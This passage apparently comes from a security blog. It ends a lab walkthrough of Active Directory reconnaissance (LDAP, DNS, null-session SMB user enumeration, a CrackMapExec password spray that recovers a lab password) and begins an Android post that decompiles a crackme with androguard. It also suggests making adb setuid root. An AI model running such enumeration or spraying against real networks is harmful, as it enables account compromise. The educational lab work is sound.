|       supportedControl: 1.2.840.113556.1.4.2064
|       supportedControl: 1.2.840.113556.1.4.2065
|       supportedControl: 1.2.840.113556.1.4.2066
|       supportedControl: 1.2.840.113556.1.4.2090
|       supportedControl: 1.2.840.113556.1.4.2205
|       supportedControl: 1.2.840.113556.1.4.2204
|       supportedControl: 1.2.840.113556.1.4.2206
|       supportedControl: 1.2.840.113556.1.4.2211
|       supportedControl: 1.2.840.113556.1.4.2239
|       supportedControl: 1.2.840.113556.1.4.2255
|       supportedControl: 1.2.840.113556.1.4.2256
|       supportedControl: 1.2.840.113556.1.4.2309
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
|       supportedLDAPPolicies: MaxPoolThreads
|       supportedLDAPPolicies: MaxPercentDirSyncRequests
|       supportedLDAPPolicies: MaxDatagramRecv
|       supportedLDAPPolicies: MaxReceiveBuffer
|       supportedLDAPPolicies: InitRecvTimeout
|       supportedLDAPPolicies: MaxConnections
|       supportedLDAPPolicies: MaxConnIdleTime
|       supportedLDAPPolicies: MaxPageSize
|       supportedLDAPPolicies: MaxBatchReturnMessages
|       supportedLDAPPolicies: MaxQueryDuration
|       supportedLDAPPolicies: MaxDirSyncDuration
|       supportedLDAPPolicies: MaxTempTableSize
|       supportedLDAPPolicies: MaxResultSetSize
|       supportedLDAPPolicies: MinResultSets
|       supportedLDAPPolicies: MaxResultSetsPerConn
|       supportedLDAPPolicies: MaxNotificationPerConn
|       supportedLDAPPolicies: MaxValRange
|       supportedLDAPPolicies: MaxValRangeTransitive
|       supportedLDAPPolicies: ThreadMemoryLimit
|       supportedLDAPPolicies: SystemMemoryLimitPercent
|       highestCommittedUSN: 172440
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       dnsHostName: IC1DC1.child1.internal.zeroday.lab
|       ldapServiceName: internal.zeroday.lab:[email protected]
|       serverName: CN=IC1DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=internal,DC=zeroday,DC=lab
|       supportedCapabilities: 1.2.840.113556.1.4.800
|       supportedCapabilities: 1.2.840.113556.1.4.1670
|       supportedCapabilities: 1.2.840.113556.1.4.1791
|       supportedCapabilities: 1.2.840.113556.1.4.1935
|       supportedCapabilities: 1.2.840.113556.1.4.2080
|       supportedCapabilities: 1.2.840.113556.1.4.2237
|       isSynchronized: TRUE
|       isGlobalCatalogReady: TRUE
|       domainFunctionality: 7
|       forestFunctionality: 7
|_      domainControllerFunctionality: 7
Service Info: Host: IC1DC1; OS: Windows

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

The ldap-rootdse Nmap script shows us that this domain controller belongs to a child domain (child1.internal.zeroday.lab), shown in the defaultNamingContext attribute, and the root domain is internal.zeroday.lab, shown in the rootDomainNamingContext attribute.

DNS Enumeration

Along with LDAP, the port scan showed that this system was listening on UDP port 53, this is almost certainly Domain Name System (DNS). DNS can be queried to determine the domain controllers for a particular domain:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Lab:~# dig srv _ldap._tcp.dc._msdcs.child1.internal.zeroday.lab @192.168.73.20

; <<>> DiG 9.11.14-3-Debian <<>> srv _ldap._tcp.dc._msdcs.child1.internal.zeroday.lab @192.168.73.20
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28760
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;_ldap._tcp.dc._msdcs.child1.internal.zeroday.lab. IN SRV

;; ANSWER SECTION:
_ldap._tcp.dc._msdcs.child1.internal.zeroday.lab. 600 IN SRV 0 100 389 IC1DC1.child1.internal.zeroday.lab.

;; ADDITIONAL SECTION:
IC1DC1.child1.internal.zeroday.lab. 3600 IN A   192.168.73.20

;; Query time: 1 msec
;; SERVER: 192.168.73.20#53(192.168.73.20)
;; WHEN: Thu Feb 13 00:15:34 GMT 2020
;; MSG SIZE  rcvd: 147

It can also be used to query the root domain's domain controllers:

1
2
3
4
Lab:~# dig +short srv _ldap._tcp.dc._msdcs.internal.zeroday.lab @192.168.73.20
0 100 389 IDC1.internal.zeroday.lab.
Lab:~# dig +short a IDC1.internal.zeroday.lab @192.168.73.20
192.168.71.20

SMB Enumeration

Server Message Block (SMB) can be really useful for attackers, there are many possible attacks against the service. Here I'll only perform some very basic enumeration.

First it's useful to know whether NULL authentication is permitted. A Metasploit module can be used to test for this:

1
2
3
4
msf5 auxiliary(scanner/smb/pipe_auditor) > run

[+] 192.168.73.20:445     - Pipes: \netlogon, \lsarpc, \samr, \atsvc, \epmapper, \eventlog, \InitShutdown, \lsass, \LSM_API_service, \ntsvcs, \protected_storage, \router, \scerpc, \srvsvc, \W32TIME_ALT, \wkssvc
[*] 192.168.73.20:        - Scanned 1 of 1 hosts (100% complete)

So we can access SMB pipes without requiring a username and password. While this isn't that common these days on domain controllers, I have seen this on some corporate networks.

We should also try enumerating users. Another Metasploit module can be used for this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf5 auxiliary(scanner/smb/smb_lookupsid) > run

[*] 192.168.73.20:445     - PIPE(LSARPC) LOCAL(ICHILD1 - 5-21-3578234567-448745970-1525302398) DOMAIN(ICHILD1 - 5-21-3578234567-448745970-1525302398)
[*] 192.168.73.20:445     - USER=Administrator RID=500
[*] 192.168.73.20:445     - USER=Guest RID=501
[*] 192.168.73.20:445     - USER=krbtgt RID=502
[*] 192.168.73.20:445     - USER=DefaultAccount RID=503
[*] 192.168.73.20:445     - GROUP=Domain Admins RID=512
[*] 192.168.73.20:445     - GROUP=Domain Users RID=513
[*] 192.168.73.20:445     - GROUP=Domain Guests RID=514
[*] 192.168.73.20:445     - GROUP=Domain Computers RID=515
[*] 192.168.73.20:445     - GROUP=Domain Controllers RID=516
[*] 192.168.73.20:445     - TYPE=4 NAME=Cert Publishers rid=517
[*] 192.168.73.20:445     - GROUP=Group Policy Creator Owners RID=520
[*] 192.168.73.20:445     - GROUP=Read-only Domain Controllers RID=521
[*] 192.168.73.20:445     - GROUP=Cloneable Domain Controllers RID=522
[*] 192.168.73.20:445     - GROUP=Protected Users RID=525
[*] 192.168.73.20:445     - GROUP=Key Admins RID=526
[*] 192.168.73.20:445     - TYPE=4 NAME=RAS and IAS Servers rid=553
[*] 192.168.73.20:445     - TYPE=4 NAME=Allowed RODC Password Replication Group rid=571
[*] 192.168.73.20:445     - TYPE=4 NAME=Denied RODC Password Replication Group rid=572
[*] 192.168.73.20:445     - USER=IC1DC1$ RID=1000
[*] 192.168.73.20:445     - TYPE=4 NAME=DnsAdmins rid=1101
[*] 192.168.73.20:445     - GROUP=DnsUpdateProxy RID=1102
[*] 192.168.73.20:445     - USER=INTERNAL$ RID=1103
[*] 192.168.73.20:445     - USER=child.user RID=1104
[*] 192.168.73.20:445     - USER=child.admin RID=1105
[*] 192.168.73.20:445     - USER=client1testspn$ RID=1106
[*] 192.168.73.20:445     - USER=child.local RID=1107
[*] 192.168.73.20:445     - USER=ChildTestSPN$ RID=1109
[*] 192.168.73.20:445     - USER=WIN10TEST$ RID=1110
[*] 192.168.73.20:445     - ICHILD1 [Administrator, Guest, krbtgt, DefaultAccount, IC1DC1$, INTERNAL$, child.user, child.admin, client1testspn$, child.local, ChildTestSPN$, WIN10TEST$ ]
[*] 192.168.73.20:        - Scanned 1 of 1 hosts (100% complete)

Password Spraying

Now that we have a list of valid usernames, it's worth trying to guess a valid password. Password spraying is a method of attack where you take a list of valid, or potentially valid, usernames and attempt to try different commonly used passwords across all usernames.

The lab environment is small but in a real world AD infrastructure it's very likely to be able to guess passwords for some accounts. Of course on a real infrastrcture extreme care has to be taken before attempting to perform password spraying attacks as there is a real possibilty of locking user accounts.

To perform a password spray CrackMapExec can be used:

1
2
3
4
5
6
Lab:~# cme smb 192.168.73.20 -d child1.internal.zeroday.lab -u users.txt -p Password4
SMB         192.168.73.20   445    IC1DC1           [*] Windows Server 2016 Datacenter Evaluation 14393 x64 (name:IC1DC1) (domain:child1.internal.zeroday.lab) (signing:True) (SMBv1:True)
SMB         192.168.73.20   445    IC1DC1           [-] child1.internal.zeroday.lab\Administrator:Password4 STATUS_LOGON_FAILURE
SMB         192.168.73.20   445    IC1DC1           [-] child1.internal.zeroday.lab\IC1DC1$:Password4 STATUS_LOGON_FAILURE
SMB         192.168.73.20   445    IC1DC1           [-] child1.internal.zeroday.lab\INTERNAL$:Password4 STATUS_LOGON_FAILURE
SMB         192.168.73.20   445    IC1DC1           [+] child1.internal.zeroday.lab\child.user:Password4

The password for the child.user account was discovered in this password spray attempt. Now recon from an authenticated point of view is possible on this domain.

Conclusion

AD security is a huge topic and I've only began the scrath the surface in this post, even from an unauthenticated point of view. Hopefully this was a half decent way to introduce the topic though.

It's worth noting that there are many toold that perform the same tests carried out in this post, but some of them did not work. I might make a post demonstrating that because it's important to understand that different tools will work in different situations, so it's very useful to have knowledge of many and try others when your first choice fails.

Further Reading

If you are serious about AD security, the best resource out there is adscurity.org by Sean Metcalf.

Android Basics

Hacking Android is a huge topic, you have the Linux kernel, native code applications and normal Android applications that run on top of the Dalvik VM, a huge attack surface with the wireless, bluetooth, USB, NFC and various other interfaces.

This post is going to be a very short introduction to the platform as well as introducing some very basic analysis techniques for analyzing an Android application.

For this post I will be using a HTC Desire HD running an unrooted Android 2.3.5, this is an old version of Android, running on an old device but it will be fine for the purposes of this post.

The host machine that I'll be using is running 64bit Gentoo running the Linux kernel version 4.0.5.

Setting Up The Environment

The first thing you need to do if you want to analyze an Android device is to install the SDK.

Depending on your system, you might need to install both the Android Studio as well as the platform tools, its important that you have the platform-tools directory because that is the directory that contains the adb binary.

adb is the Android Debug Bridge and it's used to do any sort of debugging of any android device. Without this application, debugging Android will be very difficult.

On my Windows computer this was installed to C:\Users\User\AppData\Local\Android\sdk\platform-tools.

On my Debian-based system it was installed to $HOME/Android/Sdk/platform-tools and on my Gentoo system it was installed to /usr/bin.

Where ever it is installed to, it's best to include this directory in your PATH variable so that you can run it with cd'ing to that directory or having to put the whole file path in every time.

This is optional but on Linux I've been unable to get adb to work with running it as root, instead of having to use sudo all the time I set the permissions to the adb binary to 4750 and the ownership to root:wheel, this makes it a setuid binary and so will run with root permissions but only for users in the wheel group.

The permissions look as follows:

1
2
user@exploit ~ $ ls -l `which adb`
-rwsr-x--- 1 root wheel 156128 Aug  9 01:13 /usr/bin/adb

Exploring The System Using ADB

Firstly the Android device needs to be connected to the host machine using USB.

After that we need to enable USB debugging, on my test device the setting is in Settings->Applications->Development:

You will need to confirm this:

We can now use adb to get a shell on the Android device and take a look around, first let's check the version of the Linux kernel that it's running:

1
2
3
4
5
6
7
8
9
user@exploit ~ $ adb shell
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
$ pwd
/
$ uname -a
uname: permission denied
$ cat /proc/version
Linux version 2.6.35.10-g931a37e (htc-kernel@and18-2) (gcc version 4.4.0 (GCC) ) #1 PREEMPT Wed Nov 9 14:04:03 CST 2011

So as you can see it is, in fact, running Linux version 2.6.35 but in some sort of restricted environment.

Let's check to see some details of the user that we have been logged in as:

1
2
3
4
5
6
$ whoami
whoami: permission denied
$ w
w: permission denied
$ cat /etc/passwd
/etc/passwd: No such file or directory

As you can see due to the restricted environment, the normal methods aren't working.

But there is an easy way to figure this out:

1
2
$ ps | grep ' ps'
grep: permission denied

So that didn't work either, but there is a way to use grep on the output of these commands:

1
2
3
$ exit
user@exploit ~ $ adb shell ps | grep ' ps'
shell     5968  5967  944    332   00000000 afd0b83c R ps

Here we can see we're running at the user shell. Also note that we can run the commands using adb but then pipe the output to applications running on our host system to sort through the data.

Knowing our username we can now see what shell we are running in:

1
2
3
4
user@exploit ~ $ adb shell ps | grep shell
shell     6062  29118 788    336   c009ccc8 afd0c78c S /system/bin/sh
shell     6063  6062  944    332   00000000 afd0b83c R ps
shell     29118 1     3464   216   ffffffff 00000000 S /sbin/adbd

So this is clearly a Linux system but its very different from most Linux systems, let's have a look at the directories under /:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
user@exploit ~ $ adb shell ls -l /
drwxr-xr-x root     system            2015-07-28 18:35 app-cache
dr-x------ root     root              2015-07-28 18:33 config
lrwxrwxrwx root     root              2015-07-28 18:33 sdcard -> /mnt/sdcard
drwxr-xr-x root     root              2015-07-28 18:33 acct
drwxrwxr-x root     system            2015-07-28 18:33 mnt
lrwxrwxrwx root     root              2015-07-28 18:33 vendor -> /system/vendor
lrwxrwxrwx root     root              2015-07-28 18:33 d -> /sys/kernel/debug
lrwxrwxrwx root     root              2015-07-28 18:33 etc -> /system/etc
drwxrwx--- system   cache             2015-08-15 19:00 cache
drwx------ root     root              2015-08-16 09:53 devlog
-rw-r--r-- root     root          728 1970-01-01 01:00 ueventd.spade.rc
-rw-r--r-- root     root         4429 1970-01-01 01:00 ueventd.rc
-rw-r--r-- root     root            0 1970-01-01 01:00 ueventd.goldfish.rc
drwxr-xr-x root     root              2012-11-18 05:06 system
drwxr-xr-x root     root              2015-07-28 18:32 sys
drwxr-x--- root     root              1970-01-01 01:00 sbin
dr-xr-xr-x root     root              1970-01-01 01:00 proc
-rwxr-x--- root     root         7423 1970-01-01 01:00 init.spade.rc
-rwxr-x--- root     root        21309 1970-01-01 01:00 init.rc
-rwxr-x--- root     root         1677 1970-01-01 01:00 init.goldfish.rc
-rwxr-x--- root     root       107216 1970-01-01 01:00 init
-rw-r--r-- root     root          118 1970-01-01 01:00 default.prop
drwxrwx--x system   system            2015-02-16 07:05 data
-rw-r--r-- root     root         1401 1970-01-01 01:00 cwkeys
-rw-r--r-- root     root          460 1970-01-01 01:00 bootcomplete.rc
drwx------ root     root              2011-11-09 05:59 root
drwxr-xr-x root     root              2015-08-10 08:39 dev

Again, some of these are familiar (like etc, proc, dev...) but directories like system, acct and app-cache are less familiar.

I'm not going to go through the whole of Android, the point of this section was to demonstrate that this is a Linux system but not 1 that will seem totally familiar with Linux admins.

There are, however, a couple of commands I want to mention here, firstly getprop:

1
2
3
4
5
user@exploit ~ $ adb shell getprop | grep build.version
[ro.build.version.incremental]: [208029.5]
[ro.build.version.sdk]: [10]
[ro.build.version.codename]: [REL]
[ro.build.version.release]: [2.3.5]

Here I'm just using getprop to show some information about the build version of Android but you can get a lot of information from this.

The other 1 is logcat, which is basically the system log:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
user@exploit ~ $ adb logcat -t 8
--------- beginning of /dev/log/system
--------- beginning of /dev/log/main
D/dalvikvm(11665): GC_CONCURRENT freed 513K, 37% free 5018K/7879K, external 0K/0K, paused 3ms+2ms
D/dalvikvm(14049): GC_EXPLICIT freed 13K, 41% free 4222K/7047K, external 0K/0K, paused 102ms
D/dalvikvm(11665): GC_CONCURRENT freed 545K, 36% free 5193K/8071K, external 0K/0K, paused 2ms+2ms
D/dalvikvm(11665): GC_CONCURRENT freed 594K, 36% free 5338K/8263K, external 0K/0K, paused 9ms+2ms
D/dalvikvm(11665): GC_CONCURRENT freed 779K, 38% free 5355K/8519K, external 0K/0K, paused 3ms+11ms
D/dalvikvm(11665): GC_CONCURRENT freed 831K, 37% free 5428K/8583K, external 0K/0K, paused 2ms+2ms
D/dalvikvm(11665): GC_CONCURRENT freed 857K, 38% free 5414K/8647K, external 0K/0K, paused 2ms+3ms
D/dalvikvm(11665): GC_CONCURRENT freed 721K, 37% free 5460K/8647K, external 0K/0K, paused 4ms+6ms

Here I'm just outputing the last 8 lines of the log, as you can see it's an actual built in command into adb, but you can run logcat from inside the shell too.

logcat is very useful for debugging and well as showing some information disclosure vulnerabilities that might exist in an Android application, but we'll get to that a bit later :-)

Installing And Running The Challenge App

For the purposes of this post I created a little, very basic, challenge application, which you can download from here.

You can install the application using adb:

1
2
3
4
5
user@exploit ~ $ adb push Android/src/challenge1.apk /data/local/tmp/
2927 KB/s (1052648 bytes in 0.351s)
user@exploit ~ $ adb shell pm install /data/local/tmp/challenge1.apk
        pkg: /data/local/tmp/challenge1.apk
Success

Now that the application is installed we can run it and have a look at what it does.

Starting the application shows us this:

Putting in some text in to the field and clicking on the Check Password button shows us this:

So its clear what we have to try and do here.

Android Applications

Android applications come in apk format, these are just Java archive file:

1
2
user@exploit ~/Android/src $ file challenge1.apk
challenge1.apk: Java archive data (JAR)

These are very similar to zip files and can be unzipped using the unzip utility:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
user@exploit ~/Android/src $ mkdir challenge1
user@exploit ~/Android/src $ cd challenge1
user@exploit ~/Android/src/challenge1 $ unzip ../challenge1.apk
Archive:  ../challenge1.apk
  inflating: AndroidManifest.xml
  inflating: res/anim/abc_fade_in.xml
  inflating: res/anim/abc_fade_out.xml
  inflating: res/anim/abc_grow_fade_in_from_bottom.xml
  inflating: res/anim/abc_popup_enter.xml
  inflating: res/anim/abc_popup_exit.xml
  inflating: res/anim/abc_shrink_fade_out_from_bottom.xml
...
  inflating: res/layout/notification_template_lines.xml
  inflating: res/layout/notification_template_media.xml
  inflating: res/layout/notification_template_part_chronometer.xml
  inflating: res/layout/notification_template_part_time.xml
  inflating: res/layout/select_dialog_item_material.xml
  inflating: res/layout/select_dialog_multichoice_material.xml
  inflating: res/layout/select_dialog_singlechoice_material.xml
  inflating: res/layout/support_simple_spinner_dropdown_item.xml
  inflating: res/menu/menu_main.xml
 extracting: res/mipmap-hdpi-v4/ic_launcher.png
 extracting: res/mipmap-mdpi-v4/ic_launcher.png
 extracting: res/mipmap-xhdpi-v4/ic_launcher.png
 extracting: res/mipmap-xxhdpi-v4/ic_launcher.png
 extracting: resources.arsc
  inflating: classes.dex
  inflating: META-INF/MANIFEST.MF
  inflating: META-INF/CERT.SF
  inflating: META-INF/CERT.RSA

As you will see there are a lot of files in res/, I've shortened it here.

One of the most important files is AndroidManifest.xml, this contains the configuration of the application, including activity, intent and permissions declarations.

But as you can see this is some sort of binary file:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
user@exploit ~/Android/src/challenge1 $ file AndroidManifest.xml
AndroidManifest.xml: data
user@exploit ~/Android/src/challenge1 $ cat AndroidManifest.xml
„P4Rvœª¸.2Dx¬À,J^xŒ.fz
                         versionCode
minSdkVersiontargetSdkVersion       versionName
                             allowBackupiconlabelthemenameandroid*http://schemas.android.com/apk/res/androidpackageplatformBuildVersionCodeplatformBuildVersionNammanifest+ph.exploit.crack.cha5.1.1-181972uses-sdkge11.022
intent-filteractionandroid.intent.action.MAIcategory android.intent.category.LAUNCHER,nActivity
                                                                                      €ÿÿÿÿ
ˆÿÿÿÿÿÿÿÿ
ÿÿÿÿ
ÿÿÿÿ
ÿÿÿLÿÿÿÿÿÿÿÿ
ÿÿÿÿ

ÿÿÿÿ    ÿÿÿÿÿÿÿÿt
                 ÿÿÿÿÿÿÿÿ
ÿÿÿw
ÿÿÿÿ
ÿÿÿÿ
ÿÿÿÿÿÿÿLÿÿÿÿÿÿÿÿ
ÿÿÿÿ
$ÿÿÿÿÿÿÿÿ8ÿÿÿÿÿÿÿÿ
ÿÿÿÿÿÿÿÿ8ÿÿÿÿÿÿÿÿ
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ

It's actually binary XML.

We can manually convert this to plain XML using something like AXMLPrinter2 but I'll show an easier way to look at this later.

Another important file is the classes.dex file. This contains all of our Java code.

Most code that runs on Android applications, including most of the Android Framework, is Java, but instead of compiling to Java bytecode, it is compiled into Dalvik bytecode (and stored in .dex or .odex files).

Again, this could be manually decompiled back to Java using dex2jar and looked at using jd-gui but I'll show a better way of doing this too.

Doing A Very Basic Static Analysis

To end this post I'll crack this challenge while demonstrating a quick basic analysis of the apk file using a tool called androguard created by Anthony Desnos.

Androguard is a python toolset for analyzing apk files.

Its very easy to setup, providing you have python and git installed you just run:

1
git clone https://github.com/androguard/androguard.git

This will create a directory in the current directory called androguard.

Now you just need to make sure you have the latest version of IPython installed, you can do that by running:

1
pip install ipython

Now just cd to the androguard directory and you should see the following (or something very similar):

1
2
3
user@exploit ~/tools/androguard $ ls
androarsc.py  androaxml.py   androdd.py    androdis.py   androguard   androlyze.py  androsim.py   CHANGELOG  elsim     LICENCE-2.0  README.md  tests
androauto.py  androcsign.py  androdiff.py  androgexf.py  androgui.py  androsign.py  apkviewer.py  demos      examples  Makefile     setup.py   tools

The tool we'll be using is androlyze.py, we can start it by running:

1
2
3
user@exploit ~/tools/androguard $ ./androlyze.py -s
Androlyze version 3.0
In [1]:

Now we need to import our apk file:

1
2
3
In [1]: a,d,dx = AnalyzeAPK('/home/user/Android/src/challenge1.apk', decompiler='dad')

In [2]:

Here we are using the dad decompiler, created by Geoffroy Gueguen, that comes with androguard and selecting the challenge apk file.

Now we can look at this application in more detail:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
In [2]: a.get_activities()
Out[2]: ['ph.exploit.crack.challenge1.crackchallenge1.MainActivity']

In [3]: a.get_main_activity()
Out[3]: u'ph.exploit.crack.challenge1.crackchallenge1.MainActivity'

In [4]: a.get_permissions()
Out[4]: []

In [5]: a.get_receivers()
Out[5]: []

In [6]: print a.xml['AndroidManifest.xml'].toxml()
<?xml version="1.0" ?><manifest android:versionCode="1" android:versionName="1.0" package="ph.exploit.crack.challenge1.crackchallenge1" platformBuildVersionCode="22" platformBuildVersionName="5.1.1-1819727" xmlns:android="http://schemas.android.com/apk/res/android">
<uses-sdk android:minSdkVersion="10" android:targetSdkVersion="22">
</uses-sdk>
<application android:allowBackup="true" android:icon="@7F030000" android:label="@7F060012" android:theme="@7F080077">
<activity android:label="@7F060012" android:name="ph.exploit.crack.challenge1.crackchallenge1.MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN">
</action>
<category android:name="android.intent.category.LAUNCHER">
</category>
</intent-filter>
</activity>
</application>
</manifest>

In [7]:

As you can see this is a very basic application, but we can now see the contents of the AndroidManifest.xml file.

An activity is basically just a screen, or, to relate it to a web application, a page. The main activity is the first activity that is shown to the user.

Let's try to look at some of the code.

First we'll print the different methods which are part of the main activity:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
In [7]: for m in d.CLASS_Lph_exploit_crack_challenge1_crackchallenge1_MainActivity.get_methods():
   ...:     print m.get_name()
   ...:     
<init>
onClick
onCreate
onCreateOptionsMenu
onOptionsItemSelected

In [8]:

The first place to look here is the onCreate method.

This is the code that gets run when the application first starts:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
In [8]: d.CLASS_Lph_exploit_crack_challenge1_crackchallenge1_MainActivity.METHOD_onCreate.source()
protected void onCreate(android.os.Bundle p15)
    {
        super.onCreate(p15);
        android.widget.RelativeLayout v1_1 = new android.widget.RelativeLayout(this);
        v1_1.setBackgroundColor(-16777216);
        android.widget.RelativeLayout$LayoutParams v0_1 = new android.widget.RelativeLayout$LayoutParams(-2, -2);
        android.widget.RelativeLayout$LayoutParams v2_1 = new android.widget.RelativeLayout$LayoutParams(-2, -2);
        android.widget.RelativeLayout$LayoutParams v4_1 = new android.widget.RelativeLayout$LayoutParams(-2, -2);
        android.widget.RelativeLayout$LayoutParams v8_1 = new android.widget.RelativeLayout$LayoutParams(-2, -2);
        android.widget.RelativeLayout$LayoutParams v7_1 = new android.widget.RelativeLayout$LayoutParams(-2, -2);
        v0_1.addRule(14);
        v0_1.addRule(15);
        this.checkButton = new android.widget.Button(this);
        this.checkButton.setText("Check Password");
        this.checkButton.setBackgroundColor(-1);
        this.checkButton.setTextColor(-16777216);
        this.checkButton.setId(1);
        this.checkButton.setClickable(1);
        this.checkButton.setOnClickListener(this);
        this.inputBox = new android.widget.EditText(this);
        this.inputBox.setBackgroundColor(-1);
        this.inputBox.setTextColor(-16711936);
        this.inputBox.setId(2);
        v2_1.addRule(2, this.checkButton.getId());
        v2_1.addRule(14);
        v2_1.setMargins(0, 0, 0, 50);
        android.widget.TextView v3_1 = new android.widget.TextView(this);
        v3_1.setText("Please enter the secret password:");
        v3_1.setTextColor(-1);
        v3_1.setId(3);
        v4_1.addRule(2, this.inputBox.getId());
        v4_1.addRule(14);
        v4_1.setMargins(0, 0, 0, 50);
        android.widget.TextView v9_1 = new android.widget.TextView(this);
        v9_1.setText("Welcome to Challenge 1!");
        v9_1.setTextColor(-1);
        v9_1.setId(4);
        v8_1.addRule(2, v3_1.getId());
        v8_1.addRule(14);
        v8_1.setMargins(0, 0, 0, 50);
        this.resultText = new android.widget.TextView(this);
        this.resultText.setId(5);
        this.resultText.setVisibility(4);
        v7_1.addRule(3, this.checkButton.getId());
        v7_1.addRule(14);
        v7_1.setMargins(0, 50, 0, 0);
        this.inputBox.setWidth(((int) android.util.TypedValue.applyDimension(1, 1133903872, this.getResources().getDisplayMetrics())));
        v1_1.addView(this.checkButton, v0_1);
        v1_1.addView(this.inputBox, v2_1);
        v1_1.addView(v3_1, v4_1);
        v1_1.addView(v9_1, v8_1);
        v1_1.addView(this.resultText, v7_1);
        this.setContentView(v1_1);
        return;
    }


In [9]:

We can see here that the actual interface for this application is created dynamically using Java.

As you can see from line 20, this main class is registered as the onClickListener for the button that checks the value of the password.

This means that when you press the Check Password button, it will run the onClick method in this class.

So let's look at the code for that method:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
In [9]: d.CLASS_Lph_exploit_crack_challenge1_crackchallenge1_MainActivity.METHOD_onClick.source()
public void onClick(android.view.View p4)
    {
        if (p4 == this.checkButton) {
            if (this.inputBox.getText().toString().equals("supersecurepassword") != 1) {
                this.resultText.setText("Incorrect password! :\'-(");
                this.resultText.setTextColor(-65536);
                this.resultText.setVisibility(0);
            } else {
                this.resultText.setText("Well done!! Challenge passed! :-)");
                this.resultText.setTextColor(-16711936);
                this.resultText.setVisibility(0);
            }
        }
        return;
    }


In [10]:

So here it's obvious that the password is supersecurepassword.

We can check that on the application itself:

It was fine this time but there are times when a decompilation will not be enough, the decompiler will not be able to recreate the source code well enough to get the right result.

In these cases you can use the disassembler like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
 In [10]: d.CLASS_Lph_exploit_crack_challenge1_crackchallenge1_MainActivity.METHOD_onClick.show()
########## Method Information
Lph/exploit/crack/challenge1/crackchallenge1/MainActivity;->onClick(Landroid/view/View;)V [access_flags=public]
########## Params
- local registers: v0...v3
- v4: android.view.View
- return: void
####################
***************************************************************************
onClick-BB@0x0 :
        0  (00000000) const/4             v2, 0
        1  (00000002) iget-object         v0, v3, Lph/exploit/crack/challenge1/crackchallenge1/MainActivity;->checkButton Landroid/widget/Button;
        2  (00000006) if-ne               v4, v0, 41 [ onClick-BB@0xa onClick-BB@0x58 ]

onClick-BB@0xa :
        3  (0000000a) iget-object         v0, v3, Lph/exploit/crack/challenge1/crackchallenge1/MainActivity;->inputBox Landroid/widget/EditText;
        4  (0000000e) invoke-virtual      v0, Landroid/widget/EditText;->getText()Landroid/text/Editable;
        5  (00000014) move-result-object  v0
        6  (00000016) invoke-virtual      v0, Ljava/lang/Object;->toString()Ljava/lang/String;
        7  (0000001c) move-result-object  v0
        8  (0000001e) const-string        v1, 'supersecurepassword'
        9  (00000022) invoke-virtual      v0, v1, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
        10 (00000028) move-result         v0
        11 (0000002a) const/4             v1, 1
        12 (0000002c) if-ne               v0, v1, 23 [ onClick-BB@0x30 onClick-BB@0x5a ]

onClick-BB@0x30 :
        13 (00000030) iget-object         v0, v3, Lph/exploit/crack/challenge1/crackchallenge1/MainActivity;->resultText Landroid/widget/TextView;
        14 (00000034) const-string        v1, 'Well done!! Challenge passed! :-)'
        15 (00000038) invoke-virtual      v0, v1, Landroid/widget/TextView;->setText(Ljava/lang/CharSequence;)V
        16 (0000003e) iget-object         v0, v3, Lph/exploit/crack/challenge1/crackchallenge1/MainActivity;->resultText Landroid/widget/TextView;
        17 (00000042) const               v1, -16711936
        18 (00000048) invoke-virtual      v0, v1, Landroid/widget/TextView;->setTextColor(I)V
        19 (0000004e) iget-object         v0, v3, Lph/exploit/crack/challenge1/crackchallenge1/MainActivity;->resultText Landroid/widget/TextView;
        20 (00000052) invoke-virtual      v0, v2, Landroid/widget/TextView;->setVisibility(I)V [ onClick-BB@0x58 ]

onClick-BB@0x58 :
        21 (00000058) return-void

onClick-BB@0x5a :
        22 (0000005a) iget-object         v0, v3, Lph/exploit/crack/challenge1/crackchallenge1/MainActivity;->resultText Landroid/widget/TextView;
        23 (0000005e) const-string        v1, "Incorrect password! :'-("
        24 (00000062) invoke-virtual      v0, v1, Landroid/widget/TextView;->setText(Ljava/lang/CharSequence;)V
        25 (00000068) iget-object         v0, v3, Lph/exploit/crack/challenge1/crackchallenge1/MainActivity;->resultText Landroid/widget/TextView;
        26 (0000006c) const/high16        v1, -1
